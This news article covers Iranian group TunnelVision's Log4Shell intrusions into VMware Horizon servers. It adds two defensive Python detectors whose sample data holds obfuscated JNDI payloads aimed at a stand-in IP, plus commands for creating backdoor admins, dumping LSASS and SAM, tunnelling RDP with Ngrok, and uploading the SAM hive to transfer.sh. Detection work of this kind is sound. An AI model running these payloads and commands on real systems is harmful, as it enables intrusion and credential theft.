The Log4j vulnerability has surfaced again in compromised systems, this time after state-sponsored hackers from Iran reportedly attacked VMware Horizon users.
According to cybersecurity analysts, the group behind the attacks is tracked as TunnelVision.
TunnelVision Exploits Log4J Flaw
According to a detailed report published by SentinelLabs on Thursday, Feb. 17, the attackers drew attention when they began exploiting Log4Shell (CVE-2021-44228), the flaw in Log4j, the widely used Java-based logging library.
Because the flaw allows unauthenticated remote code execution, attackers have used it to gain access to thousands of applications since its disclosure. At its peak it was one of the most widely exploited bugs on the internet, and experts expect it to keep affecting users for years to come.
TunnelVision is currently focused on compromising VMware Horizon, VMware's virtual desktop product. The Horizon Client runs on Windows, Linux and macOS desktops, but the component the attackers target is the server side, the Horizon Connection Server.
According to SentinelOne researchers Yair Rigevsky and Amitai Ben Shushan Ehrlich, the Iranian threat actors have been compromising Horizon servers, deploying backdoors and collecting sensitive information from victims.
They also run PowerShell commands and create backdoor users. Each intrusion starts with the Log4j exploit: the malicious lookup is processed by the Tomcat process that hosts Horizon's Java web applications, which then spawns a PowerShell reverse shell and gives the attackers command execution on the server.
VMware Horizon runs its Java web applications on Apache Tomcat, so a PowerShell reverse shell spawned from that process is the first sign of the intrusion. From this foothold the TunnelVision hackers were able to move through the victims' networks remotely.
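Exploitation of the Horizon Connection Server begins with a Log4j lookup string sent in a request field the server logs, and real attempts are rarely the plain `${jndi:ldap://...}` form: attackers nest Log4j's `lower:`, `upper:` and `${x:-default}` lookups to hide the word "jndi". The detector below is an added example, not code from the article or from SentinelOne; it normalizes those nested lookups before matching, so the obfuscated variants collapse to the same indicator. The request lines are constructed for the example (assumed to be in Apache combined log format, with the payload in the User-Agent or query string); the IPs and paths are made up.

```python
import re

# Constructed sample request lines in combined log format (not from the article
# or the SentinelOne report). Lines 2-5 carry a Log4Shell payload in the User-Agent
# field in progressively more obfuscated forms; lines 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [17/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Feb/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [17/Feb/2022:10:01:06 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:ldap}://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [17/Feb/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [17/Feb/2022:10:01:08 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/x}"',
    '10.0.0.12 - - [17/Feb/2022:10:02:00 +0000] "GET /portal/?q=${date:YYYY} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# A lookup with no further ${...} inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# jndi: followed by one of the JNDI provider schemes used in Log4Shell exploitation.
_JNDI = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def _resolve(content):
    """Evaluate the Log4j lookups attackers use to hide 'jndi'. Returns None when
    the lookup is not one we emulate (including the jndi lookup itself)."""
    low = content.lower()
    if low.startswith("jndi:"):
        return None                      # leave the payload in place for matching
    if low.startswith("lower:"):
        return content[6:].lower()
    if low.startswith("upper:"):
        return content[6:].upper()
    if ":-" in content:                  # default-value form ${prefix:key:-default}, e.g. ${::-j}
        return content.split(":-", 1)[1]
    return None


def normalize_lookups(s):
    """Repeatedly resolve innermost lookups until nothing changes. Each pass removes
    at least one ${...}, so the loop terminates; unknown lookups are left as-is."""
    while True:
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = _INNERMOST.sub(repl, s)
        if not changed:
            return s


def scan_access_log(lines):
    """Return one finding per line whose normalized form contains a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        m = _JNDI.search(norm)
        if m:
            payload = re.search(r"\$\{[^}]*jndi[^}]*\}", norm, re.IGNORECASE)
            findings.append({
                "line": n,
                "client": line.split(" ", 1)[0],
                "protocol": m.group(1).lower(),
                "payload": payload.group(0) if payload else norm,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['client']} -> {f['protocol']} {f['payload']}")
```

The normalization step is what matters: a signature for the literal string `jndi:` misses three of the four constructed payloads, while all four reduce to `${jndi:<scheme>://...}` after the lookups are evaluated. Run the same function over the Connection Server's Tomcat access and application logs, and treat any hit from an external client as an exploitation attempt regardless of whether the callback host resolved.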
What Iranian Hackers Do After Installing PowerShell
According to a separate report by Ars Technica, this is what the TunnelVision group does once its PowerShell backdoor is in place:
Creates a backdoor user and adds it to the administrators group.
Runs reconnaissance commands.
Dumps credentials with ProcDump and the comsvcs.dll MiniDump export (both against LSASS memory) and by saving copies of the SAM registry hive.
Installs Ngrok and Plink to tunnel Remote Desktop (RDP) out of the victim network.
SentinelOne also observed the Iranian hackers abusing several legitimate online services as part of their intrusions into VMware servers. These are the services they were seen using:
transfer.sh
pastebin.com
webhook.site
ufile.io
raw.githubusercontent.com
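The post-exploitation steps listed above, together with the legitimate services the group abuses, map directly onto process-creation telemetry. The following is an added example, not code from the article, Ars Technica or SentinelOne: a small rule set run over constructed Sysmon-style process-creation events, followed by a per-host correlation that only flags a machine when several of the stages appear on it. The events are made up for the example; the Horizon Tomcat service name `ws_TomcatService.exe` and the exact command lines are assumptions about how each stage would look, not indicators taken from the report.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events (not from the article or the
# SentinelOne report). Events 1-7 model the chain on a Horizon server; 8-9 are
# benign activity on an unrelated host.
SAMPLE_EVENTS = [
    {"id": 1, "host": "horizon-cs01",
     "parent": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",  # assumed service name
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 2, "host": "horizon-cs01", "parent": "powershell.exe", "image": "net.exe",
     "cmdline": "net user svc_backup P@ssw0rd123 /add"},
    {"id": 3, "host": "horizon-cs01", "parent": "powershell.exe", "image": "net.exe",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"id": 4, "host": "horizon-cs01", "parent": "powershell.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 652 C:\\Windows\\Temp\\l.dmp full"},
    {"id": 5, "host": "horizon-cs01", "parent": "powershell.exe", "image": "reg.exe",
     "cmdline": "reg save HKLM\\SAM C:\\Windows\\Temp\\sam.hiv"},
    {"id": 6, "host": "horizon-cs01", "parent": "powershell.exe", "image": "ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389"},
    {"id": 7, "host": "horizon-cs01", "parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Invoke-WebRequest -Uri https://transfer.sh/abc/sam.hiv -Method Put -InFile C:\\Windows\\Temp\\sam.hiv"},
    {"id": 8, "host": "build-42", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/org/repo/main/setup.ps1 -OutFile setup.ps1"},
    {"id": 9, "host": "build-42", "parent": "explorer.exe", "image": "net.exe",
     "cmdline": "net user"},
]

# The services named in the article.
LEGIT_SERVICES = ("transfer.sh", "pastebin.com", "webhook.site", "ufile.io", "raw.githubusercontent.com")


def _base(path):
    """Lower-cased file name of an image path, whichever separator was used."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# (rule name, predicate over one event). Each rule is one stage of the chain.
RULES = [
    ("tomcat_spawns_shell",
     lambda e: "tomcat" in _base(e["parent"]) and _base(e["image"]) in ("powershell.exe", "pwsh.exe", "cmd.exe")),
    ("backdoor_user_created",
     lambda e: re.search(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", e["cmdline"], re.I) is not None),
    ("user_added_to_admins",
     lambda e: re.search(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", e["cmdline"], re.I) is not None),
    ("lsass_dump",
     lambda e: re.search(r"comsvcs(\.dll)?.*minidump|procdump.*lsass", e["cmdline"], re.I) is not None),
    ("sam_hive_dump",
     lambda e: re.search(r"\breg(\.exe)?\s+save\s+hklm\\sam\b", e["cmdline"], re.I) is not None),
    ("rdp_tunnel",
     lambda e: re.search(r"ngrok.*\btcp\s+3389\b|plink.*\s-R\b", e["cmdline"], re.I) is not None),
    ("legit_service_abuse",
     lambda e: any(s in e["cmdline"].lower() for s in LEGIT_SERVICES)),
]


def match_events(events):
    """Return {event_id: [matching rule names]} for events that match at least one rule."""
    hits = {}
    for e in events:
        names = [name for name, pred in RULES if pred(e)]
        if names:
            hits[e["id"]] = names
    return hits


def flag_hosts(events, min_stages=3):
    """Correlate per host. The chain is several distinct stages on one machine, so a
    lone hit (a build box fetching a script from raw.githubusercontent.com) stays
    below the threshold while the Horizon server trips most of the rules."""
    by_id = {e["id"]: e for e in events}
    per_host = defaultdict(set)
    for eid, names in match_events(events).items():
        per_host[by_id[eid]["host"]].update(names)
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for eid, names in match_events(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(names)}")
    print("flagged hosts:", flag_hosts(SAMPLE_EVENTS))
```

The first rule is the highest-signal one on its own: a Horizon Connection Server's Tomcat service has no business spawning PowerShell, so that event alone justifies an investigation even before the rest of the chain appears. The remaining rules are individually noisy in a large estate, which is why they are combined per host rather than alerted one by one; raise `min_stages` if the environment legitimately uses Ngrok or the listed services.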
"We track this cluster separately under the name TunnelVision. This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions," the SentinelOne experts said.
This is not the first time the Log4j flaw has been used against VMware Horizon servers, including to deploy ransomware.
Last month, Tech Times reported that Chinese hackers were allegedly responsible for infecting the platform with NightSky ransomware.
According to that article, the hackers demanded a ransom from the victims and, in return, promised not to leak the personal information of the affected individuals.
Meanwhile, the site reported in a separate story that North Korean hackers ran a new phishing campaign aimed at Lockheed Martin job applicants. The Lazarus Group posed as a legitimate firm in order to deliver malware to victims through email attachments.
This article is owned by Tech Times
Written by Joseph Henry